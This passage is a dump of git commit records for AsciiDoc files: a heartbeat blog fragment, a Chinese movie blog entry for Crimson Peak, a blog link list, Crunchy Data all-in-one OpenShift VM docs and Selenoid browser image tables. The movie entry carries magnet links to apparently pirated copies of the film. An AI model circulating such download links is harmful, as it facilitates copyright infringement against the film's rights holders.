metabolism with lower heart rate compared to, say, flies, with faster metabolism.\n\nIronically, if we have fixed number of heartbeats, wouldn't running\/exercising make us die faster? I suppose, the long term benefits outweigh shot term loss.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7ab6b4b34b8acf7e53f1961812f1f6386d38400b","subject":"Update 2015-10-16-Crimson-Peak.adoc","message":"Update 2015-10-16-Crimson-Peak.adoc","repos":"heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io","old_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_contents":"= \u7329\u7ea2\u5c71\u5cf0 Crimson Peak\n:hp-alt-title: Crimson Peak\n:published_at: 2015-10-16\n:hp-tags: 2015 \u5267\u60c5\n:hardbreaks:\n\nimage::http:\/\/i12.tietuku.com\/3a6a071dff411487t.jpg[link=\"http:\/\/i12.tietuku.com\/3a6a071dff411487.jpg\"]\n\n== \u7329\u7ea2\u5c71\u5cf0 Crimson Peak (2015)\n\u5bfc\u6f14: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57\n\u7f16\u5267: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57 \/ \u9a6c\u4fee\u00b7\u7f57\u5bbe\u65af \/ \u9732\u8f9b\u8fbe\u00b7\u8003\u514b\u68ee\n\u4e3b\u6f14: \u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 \/ \u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f \/ \u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 \/ \u67e5\u7406\u00b7\u6c49\u7eb3\u59c6 \/ \u5409\u59c6\u00b7\u6bd4\u5f17\n\u7c7b\u578b: \u5267\u60c5 \/ \u60ac\u7591 \/ \u60ca\u609a\n\u5b98\u65b9\u7f51\u7ad9: http:\/\/crimsonpeak-film.com[crimsonpeak-film.com]\n\u5236\u7247\u56fd\u5bb6\/\u5730\u533a: \u7f8e\u56fd \/ \u52a0\u62ff\u5927\n\u8bed\u8a00: \u82f1\u8bed\n\u4e0a\u6620\u65e5\u671f: 2015-10-16(\u7f8e\u56fd)\n\u7247\u957f: 119\u5206\u949f\n\u53c8\u540d: \u8840\u8272\u5e84\u56ed(\u6e2f) \/ \u8165\u7ea2\u5c71\u5e84(\u53f0) \/ Haunted Peak\nIMDb\u94fe\u63a5: http:\/\/www.imdb.com\/title\/tt2554274[tt2554274]\n\n== \u5267\u60c5\u7b80\u4ecb\n\u3000\u3000\u4f0a\u8fea\u65af\uff08\u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 Mia Wasikowska \u9970\uff09\u662f\u4e00\u540d\u4e1a\u4f59\u6050\u6016\u5c0f\u8bf4\u4f5c\u5bb6\uff0c\u67d0\u65e5\uff0c\u5979\u9082\u9005\u4e86\u82f1\u4fca\u7684\u82f1\u56fd\u53d1\u660e\u5bb6\u6258\u9a6c\u65af\uff08\u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f Tom Hiddleston \u9970\uff09\uff0c\u540e\u8005\u7684\u5f6c\u5f6c\u6709\u793c\u6e29\u6587\u5c14\u96c5\u5f88\u5feb\u5c31\u5438\u5f15\u4e86\u4f0a\u8fea\u65af\u7684\u6ce8\u610f\uff0c\u4e24\u4eba\u53d1\u5c55\u8fc5\u901f\u3002\u7136\u800c\uff0c\u4f0a\u8fea\u65af\u7684\u7236\u4eb2\u5361\u7279\uff08\u5409\u59c6\u00b7\u6bd4\u5f17 Jim Beaver \u9970\uff09\u5374\u5bf9\u6258\u9a6c\u65af\u5145\u6ee1\u4e86\u654c\u610f\uff0c\u575a\u51b3\u53cd\u5bf9\u5973\u513f\u540c\u4ed6\u6765\u5f80\u3002\n\u3000\u3000\u5c31\u5728\u8fd9\u4e2a\u8282\u9aa8\u773c\u4e0a\uff0c\u5361\u7279\u610f\u5916\u8eab\u4ea1\uff0c\u4f0a\u8fea\u65af\u6bc5\u7136\u51b3\u5b9a\u79bb\u5f00\u81ea\u5df1\u7684\u5bb6\u4e61\uff0c\u8ddf\u968f\u6258\u9a6c\u65af\u6765\u5230\u4e86\u51b0\u5929\u96ea\u5730\u7684\u574e\u5e03\u91cc\u4e9a\u90e1\uff0c\u5728\u8fd9\u91cc\uff0c\u77d7\u7acb\u7740\u4e00\u95f4\u8c6a\u534e\u800c\u53c8\u8352\u51c9\u7684\u522b\u5885\uff0c\u4eba\u4eec\u79f0\u5b83\u4e3a\u201c\u7329\u7ea2\u5c71\u5e84\u201d\u3002\u8fce\u63a5\u4f0a\u8fea\u65af\u548c\u6258\u9a6c\u65af\u7684\uff0c\u662f\u6258\u9a6c\u65af\u7684\u59d0\u59d0\u9732\u5e0c\u5c14\uff08\u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 Jessica Chastain \u9970\uff09\uff0c\u9732\u5e0c\u5c14\u8be1\u5f02\u800c\u53c8\u7c97\u66b4\u7684\u6001\u5ea6\u8ba9\u4f0a\u8fea\u65af\u611f\u5230\u5341\u5206\u4e0d\u9002\u3002\u5f88\u5feb\uff0c\u4f0a\u8fea\u65af\u5c31\u53d1\u73b0\uff0c\u5728\u8fd9\u5ea7\u4eff\u4f5b\u5177\u6709\u751f\u547d\u7684\u522b\u5885\u91cc\uff0c\u98d8\u8361\u7740\u6570\u7f15\u6e38\u9b42\uff0c\u57cb\u85cf\u4e86\u6570\u4e0d\u6e05\u7684\u79d8\u5bc6\u3002\n\n== \u4e0b\u8f7d\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD720P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:6ff9d5c12e8dad2be3ecb38826107e333fefbbf0[Magnet]\n\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD1080P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:152a352ff89c1bae2296b52363aa5bd9f7603618[Magnet]","old_contents":"= \u7329\u7ea2\u5c71\u5cf0 Crimson Peak\n:hp-alt-title: Crimson Peak\n:published_at: 2015-10-16\n:hp-tags: 2015\n:hardbreaks:\n\nimage::http:\/\/i12.tietuku.com\/3a6a071dff411487t.jpg[link=\"http:\/\/i12.tietuku.com\/3a6a071dff411487.jpg\"]\n\n== \u7329\u7ea2\u5c71\u5cf0 Crimson Peak (2015)\n\u5bfc\u6f14: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57\n\u7f16\u5267: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57 \/ \u9a6c\u4fee\u00b7\u7f57\u5bbe\u65af \/ \u9732\u8f9b\u8fbe\u00b7\u8003\u514b\u68ee\n\u4e3b\u6f14: \u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 \/ \u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f \/ \u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 \/ \u67e5\u7406\u00b7\u6c49\u7eb3\u59c6 \/ \u5409\u59c6\u00b7\u6bd4\u5f17\n\u7c7b\u578b: \u5267\u60c5 \/ \u60ac\u7591 \/ \u60ca\u609a\n\u5b98\u65b9\u7f51\u7ad9: http:\/\/crimsonpeak-film.com[crimsonpeak-film.com]\n\u5236\u7247\u56fd\u5bb6\/\u5730\u533a: \u7f8e\u56fd \/ \u52a0\u62ff\u5927\n\u8bed\u8a00: \u82f1\u8bed\n\u4e0a\u6620\u65e5\u671f: 2015-10-16(\u7f8e\u56fd)\n\u7247\u957f: 119\u5206\u949f\n\u53c8\u540d: \u8840\u8272\u5e84\u56ed(\u6e2f) \/ \u8165\u7ea2\u5c71\u5e84(\u53f0) \/ Haunted Peak\nIMDb\u94fe\u63a5: http:\/\/www.imdb.com\/title\/tt2554274[tt2554274]\n\n== \u5267\u60c5\u7b80\u4ecb\n\u3000\u3000\u4f0a\u8fea\u65af\uff08\u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 Mia Wasikowska \u9970\uff09\u662f\u4e00\u540d\u4e1a\u4f59\u6050\u6016\u5c0f\u8bf4\u4f5c\u5bb6\uff0c\u67d0\u65e5\uff0c\u5979\u9082\u9005\u4e86\u82f1\u4fca\u7684\u82f1\u56fd\u53d1\u660e\u5bb6\u6258\u9a6c\u65af\uff08\u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f Tom Hiddleston \u9970\uff09\uff0c\u540e\u8005\u7684\u5f6c\u5f6c\u6709\u793c\u6e29\u6587\u5c14\u96c5\u5f88\u5feb\u5c31\u5438\u5f15\u4e86\u4f0a\u8fea\u65af\u7684\u6ce8\u610f\uff0c\u4e24\u4eba\u53d1\u5c55\u8fc5\u901f\u3002\u7136\u800c\uff0c\u4f0a\u8fea\u65af\u7684\u7236\u4eb2\u5361\u7279\uff08\u5409\u59c6\u00b7\u6bd4\u5f17 Jim Beaver \u9970\uff09\u5374\u5bf9\u6258\u9a6c\u65af\u5145\u6ee1\u4e86\u654c\u610f\uff0c\u575a\u51b3\u53cd\u5bf9\u5973\u513f\u540c\u4ed6\u6765\u5f80\u3002\n\u3000\u3000\u5c31\u5728\u8fd9\u4e2a\u8282\u9aa8\u773c\u4e0a\uff0c\u5361\u7279\u610f\u5916\u8eab\u4ea1\uff0c\u4f0a\u8fea\u65af\u6bc5\u7136\u51b3\u5b9a\u79bb\u5f00\u81ea\u5df1\u7684\u5bb6\u4e61\uff0c\u8ddf\u968f\u6258\u9a6c\u65af\u6765\u5230\u4e86\u51b0\u5929\u96ea\u5730\u7684\u574e\u5e03\u91cc\u4e9a\u90e1\uff0c\u5728\u8fd9\u91cc\uff0c\u77d7\u7acb\u7740\u4e00\u95f4\u8c6a\u534e\u800c\u53c8\u8352\u51c9\u7684\u522b\u5885\uff0c\u4eba\u4eec\u79f0\u5b83\u4e3a\u201c\u7329\u7ea2\u5c71\u5e84\u201d\u3002\u8fce\u63a5\u4f0a\u8fea\u65af\u548c\u6258\u9a6c\u65af\u7684\uff0c\u662f\u6258\u9a6c\u65af\u7684\u59d0\u59d0\u9732\u5e0c\u5c14\uff08\u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 Jessica Chastain \u9970\uff09\uff0c\u9732\u5e0c\u5c14\u8be1\u5f02\u800c\u53c8\u7c97\u66b4\u7684\u6001\u5ea6\u8ba9\u4f0a\u8fea\u65af\u611f\u5230\u5341\u5206\u4e0d\u9002\u3002\u5f88\u5feb\uff0c\u4f0a\u8fea\u65af\u5c31\u53d1\u73b0\uff0c\u5728\u8fd9\u5ea7\u4eff\u4f5b\u5177\u6709\u751f\u547d\u7684\u522b\u5885\u91cc\uff0c\u98d8\u8361\u7740\u6570\u7f15\u6e38\u9b42\uff0c\u57cb\u85cf\u4e86\u6570\u4e0d\u6e05\u7684\u79d8\u5bc6\u3002\n\n== \u4e0b\u8f7d\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD720P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:6ff9d5c12e8dad2be3ecb38826107e333fefbbf0[Magnet]\n\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD1080P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:152a352ff89c1bae2296b52363aa5bd9f7603618[Magnet]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d6fa948b4b8358b5455befffabb7fc452a3ef68a","subject":"Update 2019-01-31-Blog-Servers.adoc","message":"Update 2019-01-31-Blog-Servers.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_contents":"= \u535a\u5ba2\u670d\u52a1\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Blog, \n:hp-alt-title: Blog Servers\n\n== \u4e16\u754c\n* https:\/\/www.blogger.com\/about\/?r=1-null_user[Blogger^]\n","old_contents":"= \u535a\u5ba2\u670d\u52a1\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Blog, \n:hp-alt-title: Blog Servers\n\n== \u4e16\u754c\n* https:\/\/www.blogger.com\/about\/?r=1-null_user[Blogger]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8ec61408735288def60cf23c45de3e4fe58891ba","subject":"update all-in-one docs","message":"update all-in-one docs\n","repos":"CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"docs\/all-in-one\/all-in-one.asciidoc","new_file":"docs\/all-in-one\/all-in-one.asciidoc","new_contents":"= all-in-one explained\nCrunchy Data Solutions, Inc.\nv1.2.6, {docdate}\n:title-logo-image: image:crunchy_logo.png[\"CrunchyData Logo\",align=\"center\",scaledwidth=\"80%\"]\n\n== All-In-One Crunchy OSE Image\n\nTo allow users to take a look at crunchy on Openshift, \nwe have created an all-in-one Virtual Machine that you\ncan run which will include Openshift and the Crunchy\ncontainers.\n\nThe image can be imported as an appliance in VirtualBox.\n\n=== configuration\n\n\nThe image uses a NAT interface and Host Only Interface for networking. \nThe Host Only interface lets us set a static IP of 192.168.56.6, this\naddress is related to the host's vboxnet0 ip address which by default\nis 192.168.56.1 on VirtualBox. \n\nThe NAT interface allows the VM access to the internet and allows\nfor ssh access from the host.\n\nThe VM has an entry in \/etc\/dhcp\/dhclient.conf that prepends\nthe 192.168.56.6 address as a nameserver. This allows us to \ndo DNS discovery using the Openshift DNS container which \nbinds to 192.168.56.6:53.\n\nThe image includes a Gnome UI environment if you want to use that, \nespecially useful for using the Openshift web console.\n\nThe VM instance has a *crunchy* user created with a password of *crunchy*.\nThis user has sudo privs.\n\n=== Openshift 3.3\n\nOpenshift 3.3 is installed and running when you start the VM.\n\nThere are 10 small PVs already created and each is hosted on \na local NFS \/nfsfileshare.\n\nThe openshift is configured to allow any user to log in. The *crunchy*\nuser is already created, a password of *crunchy* is also specified. An\nopenshift project named *crunchy* is already created as well.\n\nThe *crunchy* openshift user has been granted openshift cluster-admin\nprivs which allows it to do pretty much anything including\ncreating PVs.\n\nYou can start Gnome by logging in and typing:\n....\nstartx\n....\n\nFirefox is installed and the openshift console is available at https:\/\/10.0.2.15:8443\/console\n\n=== Crunchy Images\n\nThe crunchy version 1.2.6 container images are preinstalled\nin the VM instance.\n\n=== Crunchy Examples\n\nThe crunchy container examples for openshift are installed\nhere:\n\n==== $BUILDBASE\/examples\/openshift\nThis directory contains all sorts of examples that create pods\nand services when you run the run.sh script in each subdirectory.\n\n==== $BUILDBASE\/examples\/dedicated\nThis directory contains openshift templates that are pre-installed\ninto the Openshift environment, with these you can click on Add To Project\nin the web console to deploy containers.\n\n\t\n\n== Legal Notices\n\nCopyright \u00a9 2016 Crunchy Data Solutions, Inc.\n\nCRUNCHY DATA SOLUTIONS, INC. PROVIDES THIS GUIDE \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n\nCrunchy, Crunchy Data Solutions, Inc. and the Crunchy Hippo Logo are trademarks of Crunchy Data Solutions, Inc.\n\n","old_contents":"= all-in-one explained\nCrunchy Data Solutions, Inc.\nv1.2.6, {docdate}\n:title-logo-image: image:crunchy_logo.png[\"CrunchyData Logo\",align=\"center\",scaledwidth=\"80%\"]\n\n== All-In-One Crunchy OSE Image\n\nTo allow users to take a look at crunchy on Openshift, \nwe have created an all-in-one Virtual Machine that you\ncan run which will include Openshift and the Crunchy\ncontainers.\n\nThe image can be imported as an appliance in VirtualBox.\n\n=== configuration\n\n\nThe image uses a NAT interface for networking. \n\nThe image includes a Gnome UI environment if you want to use that, \nespecially useful for using the Openshift web console.\n\nThe VM instance has a *crunchy* user created with a password of *crunchy*.\nThis user has sudo privs.\n\n=== Openshift 3.3\n\nOpenshift 3.3 is installed and running when you start the VM.\n\nThere are 10 small PVs already created and each is hosted on \na local NFS \/nfsfileshare.\n\nThe openshift is configured to allow any user to log in. The *crunchy*\nuser is already created, a password of *crunchy* is also specified. An\nopenshift project named *crunchy* is already created as well.\n\nThe *crunchy* openshift user has been granted openshift cluster-admin\nprivs which allows it to do pretty much anything including\ncreating PVs.\n\nYou can start Gnome by logging in and typing:\n....\nstartx\n....\n\nFirefox is installed and the openshift console is available at https:\/\/10.0.2.15:8443\/console\n\n=== Crunchy Images\n\nThe crunchy version 1.2.6 container images are preinstalled\nin the VM instance.\n\n=== Crunchy Examples\n\nThe crunchy container examples for openshift are installed\nhere:\n\n==== $BUILDBASE\/examples\/openshift\nThis directory contains all sorts of examples that create pods\nand services when you run the run.sh script in each subdirectory.\n\n==== $BUILDBASE\/examples\/dedicated\nThis directory contains openshift templates that are pre-installed\ninto the Openshift environment, with these you can click on Add To Project\nin the web console to deploy containers.\n\n\t\n\n== Legal Notices\n\nCopyright \u00a9 2016 Crunchy Data Solutions, Inc.\n\nCRUNCHY DATA SOLUTIONS, INC. PROVIDES THIS GUIDE \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n\nCrunchy, Crunchy Data Solutions, Inc. and the Crunchy Hippo Logo are trademarks of Crunchy Data Solutions, Inc.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57a610b207f28b45e7f7ff0daf6caab4b47ec0e8","subject":"Added Chrome 74.0 image information","message":"Added Chrome 74.0 image information\n","repos":"aerokube\/selenoid,aandryashin\/selenoid,vania-pooh\/selenoid,aandryashin\/selenoid,vania-pooh\/selenoid,aerokube\/selenoid","old_file":"docs\/browser-image-information.adoc","new_file":"docs\/browser-image-information.adoc","new_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .25+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n|===\n\nWARNING: Firefox 53.0+ images require Selenium client 3.4.0 or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 1.3.9 | 0.13.0 | 48.0.2 (page load timeout, native events and proxies don't work) .19+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 1.3.9 | 0.13.0 | 49.0.2 (page load timeout, native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 1.3.9 | 0.13.0 | 50.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 1.3.9 | 0.14.0 | 51.0.1 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 1.3.9 | 0.15.0 | 52.0.2 (page load timeout, native events, switching windows and proxies don't work) \n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.9 | 0.16.0 | 53.0.2 (switching windows may not work)\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.9 | 0.17.0 | 54.0.1 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.9 | 0.18.0 | 55.0.1 (switching windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.9 | 0.19.1 | 56.0.1 \n| selenoid\/firefox:57.0 | selenoid\/vnc:firefox_57.0 | 1.3.9 | 0.19.1 | 57.0 \n| selenoid\/firefox:58.0 | selenoid\/vnc:firefox_58.0 | 1.6.0 | 0.20.1 | 58.0\n| selenoid\/firefox:59.0 | selenoid\/vnc:firefox_59.0 | 1.6.0 | 0.20.1 | 59.0.1\n| selenoid\/firefox:60.0 | selenoid\/vnc:firefox_60.0 | 1.6.2 | 0.21.0 | 60.0.2\n| selenoid\/firefox:61.0 | selenoid\/vnc:firefox_61.0 | 1.6.2 | 0.21.0 | 61.0\n| selenoid\/firefox:62.0 | selenoid\/vnc:firefox_62.0 | 1.7.2 | 0.22.0 | 62.0\n| selenoid\/firefox:63.0 | selenoid\/vnc:firefox_63.0 | 1.8.1 | 0.23.0 | 63.0\n| selenoid\/firefox:64.0 | selenoid\/vnc:firefox_64.0 | 1.8.4 | 0.23.0 | 64.0\n| selenoid\/firefox:65.0 | selenoid\/vnc:firefox_65.0 | 1.9.0 | 0.24.0 | 65.0\n| selenoid\/firefox:66.0 | selenoid\/vnc:firefox_66.0 | 1.9.1 | 0.24.0 | 66.0.1\n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n| selenoid\/chrome:63.0 | selenoid\/vnc:chrome_63.0 | 2.33 | 63.0.3239.84\n| selenoid\/chrome:64.0 | selenoid\/vnc:chrome_64.0 | 2.35 | 64.0.3282.119\n| selenoid\/chrome:65.0 | selenoid\/vnc:chrome_65.0 | 2.38 | 65.0.3325.181\n| selenoid\/chrome:66.0 | selenoid\/vnc:chrome_66.0 | 2.38 | 66.0.3359.117\n| selenoid\/chrome:67.0 | selenoid\/vnc:chrome_67.0 | 2.39 | 67.0.3396.62\n| selenoid\/chrome:68.0 | selenoid\/vnc:chrome_68.0 | 2.41 | 68.0.3440.106\n| selenoid\/chrome:69.0 | selenoid\/vnc:chrome_69.0 | 2.42 | 69.0.3497.100\n| selenoid\/chrome:70.0 | selenoid\/vnc:chrome_70.0 | 2.44 | 70.0.3538.110\n| selenoid\/chrome:71.0 | selenoid\/vnc:chrome_71.0 | 2.44 | 71.0.3578.80\n| selenoid\/chrome:72.0 | selenoid\/vnc:chrome_72.0 | 2.46 | 72.0.3626.121\n| selenoid\/chrome:73.0 | selenoid\/vnc:chrome_73.0 | 73.0.3683.68 | 73.0.3683.75\n| selenoid\/chrome:74.0 | selenoid\/vnc:chrome_74.0 | 74.0.3729.108 | 74.0.3729.6\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. If you have such packages - we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to bug in *Operadriver* to work with *Opera Blink* images you need to pass additional 